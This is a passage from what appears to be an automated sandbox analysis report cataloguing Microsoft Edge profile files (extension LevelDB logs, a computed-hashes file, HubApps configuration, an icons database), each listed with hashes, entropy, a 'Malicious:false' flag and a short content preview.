                                                                                                                                                                                                                                                                                                        SHA-512:7DAC490312990BBE6C0A25B1EF483E0BB3FB3BCF3A3E06DFF5D7E5FDD809BFCDBB65FCC0E6ADD014F5F1CC6E94F9A13BB3F638CC6CE9D03B8D28ACD16F9F98BA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.188975663271872
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXnjyq2PN723oH+Tcwt8aPrqIFUt8EXn11Zmw+EXnjRkwON723oH+Tcwt8amLJ:ZjyvVaYebL3FUt8KX/+KjR5OaYebQJ
                                                                                                                                                                                                                                                                                                        MD5:C274A33FE7442A14BECA1DE27FBD12CE
                                                                                                                                                                                                                                                                                                        SHA1:222B61CFBF2F42E553538929CD8F49292D2FA2F3
                                                                                                                                                                                                                                                                                                        SHA-256:19987FF2DE07FD2176B3C99F7079B220EE89494AE5C5E0A436F53475EB30FE77
                                                                                                                                                                                                                                                                                                        SHA-512:9C8B863CCF88FB3FAB58D35CAAA258B7333B5F991DEC4D53F5EED3BCD52759A03FD24028957A89B02FA28CDB346D443B51B14E033B9CA1E0CEC1868DB99D6269
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.716 1be4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/24-13:28:19.716 1be4 Recovering log #3.2024/12/24-13:28:19.716 1be4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.188975663271872
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXnjyq2PN723oH+Tcwt8aPrqIFUt8EXn11Zmw+EXnjRkwON723oH+Tcwt8amLJ:ZjyvVaYebL3FUt8KX/+KjR5OaYebQJ
                                                                                                                                                                                                                                                                                                        MD5:C274A33FE7442A14BECA1DE27FBD12CE
                                                                                                                                                                                                                                                                                                        SHA1:222B61CFBF2F42E553538929CD8F49292D2FA2F3
                                                                                                                                                                                                                                                                                                        SHA-256:19987FF2DE07FD2176B3C99F7079B220EE89494AE5C5E0A436F53475EB30FE77
                                                                                                                                                                                                                                                                                                        SHA-512:9C8B863CCF88FB3FAB58D35CAAA258B7333B5F991DEC4D53F5EED3BCD52759A03FD24028957A89B02FA28CDB346D443B51B14E033B9CA1E0CEC1868DB99D6269
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.716 1be4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/24-13:28:19.716 1be4 Recovering log #3.2024/12/24-13:28:19.716 1be4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2362815603898305
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXjSIaq2PN723oH+Tcwt865IFUt8EXjSITZmw+EXjSIJkwON723oH+Tcwt86+ULJ:ZivVaYeb/WFUt8Kr/+Kh5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                        MD5:E13B2B401A8DDB86D2768DB74EF1D79E
                                                                                                                                                                                                                                                                                                        SHA1:F09A9DB76FF9E94071F8A5458511362FC8147404
                                                                                                                                                                                                                                                                                                        SHA-256:62DB4549CC486B1B4511BD0DCB75152CEEDFA354D6F8ED7B516661CAA2B97F41
                                                                                                                                                                                                                                                                                                        SHA-512:77E31BA563A56CC9768464A9FD37E9005B381B4DB9A390334E08A31F3F3DA7FBB6905A2A1F0EAB30AB08DAA32619412123FCDD57EB231862BCE927AD4F1F1849
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.757 1b84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/24-13:28:19.757 1b84 Recovering log #3.2024/12/24-13:28:19.757 1b84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2362815603898305
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:NXjSIaq2PN723oH+Tcwt865IFUt8EXjSITZmw+EXjSIJkwON723oH+Tcwt86+ULJ:ZivVaYeb/WFUt8Kr/+Kh5OaYeb/+SJ
                                                                                                                                                                                                                                                                                                        MD5:E13B2B401A8DDB86D2768DB74EF1D79E
                                                                                                                                                                                                                                                                                                        SHA1:F09A9DB76FF9E94071F8A5458511362FC8147404
                                                                                                                                                                                                                                                                                                        SHA-256:62DB4549CC486B1B4511BD0DCB75152CEEDFA354D6F8ED7B516661CAA2B97F41
                                                                                                                                                                                                                                                                                                        SHA-512:77E31BA563A56CC9768464A9FD37E9005B381B4DB9A390334E08A31F3F3DA7FBB6905A2A1F0EAB30AB08DAA32619412123FCDD57EB231862BCE927AD4F1F1849
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:19.757 1b84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/24-13:28:19.757 1b84 Recovering log #3.2024/12/24-13:28:19.757 1b84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.14883001935007
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:N4ppQyq2PN723oH+Tcwt8NIFUt8E4ppG1Zmw+E4ppQRkwON723oH+Tcwt8+eLJ:aVvVaYebpFUt8nG1/+nI5OaYebqJ
                                                                                                                                                                                                                                                                                                        MD5:0DB3A25B179BB7E04B7B1F19E554EE0D
                                                                                                                                                                                                                                                                                                        SHA1:F9A43D51D7EB5D16260471ECA1ACC223E665B504
                                                                                                                                                                                                                                                                                                        SHA-256:A2594DA54E95A292BDEE4CC067FF973E111BF4D332F375B4BC0BB581640DBD23
                                                                                                                                                                                                                                                                                                        SHA-512:AFF2AC3E973F830B2927642231123E9F3E93B8188C7EC2B4798E65EF928619DC6DA707EB0632C961E5B021EECCC8714C45DF7323ABA9DC02BE15751E05525108
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.907 1b70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/24-13:28:20.907 1b70 Recovering log #3.2024/12/24-13:28:20.907 1b70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.14883001935007
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:N4ppQyq2PN723oH+Tcwt8NIFUt8E4ppG1Zmw+E4ppQRkwON723oH+Tcwt8+eLJ:aVvVaYebpFUt8nG1/+nI5OaYebqJ
                                                                                                                                                                                                                                                                                                        MD5:0DB3A25B179BB7E04B7B1F19E554EE0D
                                                                                                                                                                                                                                                                                                        SHA1:F9A43D51D7EB5D16260471ECA1ACC223E665B504
                                                                                                                                                                                                                                                                                                        SHA-256:A2594DA54E95A292BDEE4CC067FF973E111BF4D332F375B4BC0BB581640DBD23
                                                                                                                                                                                                                                                                                                        SHA-512:AFF2AC3E973F830B2927642231123E9F3E93B8188C7EC2B4798E65EF928619DC6DA707EB0632C961E5B021EECCC8714C45DF7323ABA9DC02BE15751E05525108
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:20.907 1b70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/24-13:28:20.907 1b70 Recovering log #3.2024/12/24-13:28:20.907 1b70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.647765064718782
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:aj9P0oP/KbtfjlgQkQerGc7gam6IThj773pLLRKToaAu:adnP/ylge2pajF7NRKcC
                                                                                                                                                                                                                                                                                                        MD5:95E3DB17726EF29867B77AEC1E3A4CF9
                                                                                                                                                                                                                                                                                                        SHA1:9C443F1977D2A8E2712B2E54EC08290724B17998
                                                                                                                                                                                                                                                                                                        SHA-256:DF9A502211B87B3A07FB4A47CE44B449D7CA28DD1F79ADC993DEBABEEA5BBC31
                                                                                                                                                                                                                                                                                                        SHA-512:968A1E32269D2BC915B6D791999A56927F41B829D69441803B095E9293C7CF9DA2A802D60091A6BF78FF0C1FA85011814C89B8F3C6B973F4D2CEB5C89D21B568
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):409
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.237622002992284
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:UBvVaYeb8rcHEZrELFUt8z8/+z95OaYeb8rcHEZrEZSJ:qVaYeb8nZrExg8ZOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                        MD5:CCB9AD144C79B2887AB37EC2181E4CC7
                                                                                                                                                                                                                                                                                                        SHA1:491D885EB7C509B10FE37F8E9DECD9CFD1A75265
                                                                                                                                                                                                                                                                                                        SHA-256:B10602F7E7D819272D994E9463B8393C818B33D934A013EF1FE4A4A915916847
                                                                                                                                                                                                                                                                                                        SHA-512:D9F0AE6361714DD352EAEEC199DC4542A222360D902E6821750B7FD0D05B927891B4A3995649EB81C44707478D3814578A5558BCB4917A89DE9C1FB497DB5B97
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:23.205 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/24-13:28:23.205 db8 Recovering log #3.2024/12/24-13:28:23.206 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):409
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.237622002992284
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:UBvVaYeb8rcHEZrELFUt8z8/+z95OaYeb8rcHEZrEZSJ:qVaYeb8nZrExg8ZOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                        MD5:CCB9AD144C79B2887AB37EC2181E4CC7
                                                                                                                                                                                                                                                                                                        SHA1:491D885EB7C509B10FE37F8E9DECD9CFD1A75265
                                                                                                                                                                                                                                                                                                        SHA-256:B10602F7E7D819272D994E9463B8393C818B33D934A013EF1FE4A4A915916847
                                                                                                                                                                                                                                                                                                        SHA-512:D9F0AE6361714DD352EAEEC199DC4542A222360D902E6821750B7FD0D05B927891B4A3995649EB81C44707478D3814578A5558BCB4917A89DE9C1FB497DB5B97
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/24-13:28:23.205 db8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/24-13:28:23.205 db8 Recovering log #3.2024/12/24-13:28:23.206 db8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1041
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.608527730409058
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:VTlW1QYMz7lsoP1dOn5pYRo3YInWY14YOzHb6q0OSLUYlMRE8+RqIeureF33Z+7N:VZWWla5XWrXZjWpV03y1x4fMyG
                                                                                                                                                                                                                                                                                                        MD5:F38BD0E5233BB38BE6E8B62CD9DCF201
                                                                                                                                                                                                                                                                                                        SHA1:4AEAA1250C693A282D8E30440C7DE4F92FD470A5
                                                                                                                                                                                                                                                                                                        SHA-256:CCB698A1E165AB007496933E083CAB35E8DD6D846BA74561437E3898158AEA6F
                                                                                                                                                                                                                                                                                                        SHA-512:668FCDE20365170DA9F9D4A20AA2B87DFCD06177CA4D89323AE105E842B415F9EF7DE6BE2A93632CD6946E9FA66945990C07F9DA14FC1E3BA4821A6B8C7C5618
                                                                                                                                                                                                                                                                                                        Malicious:false
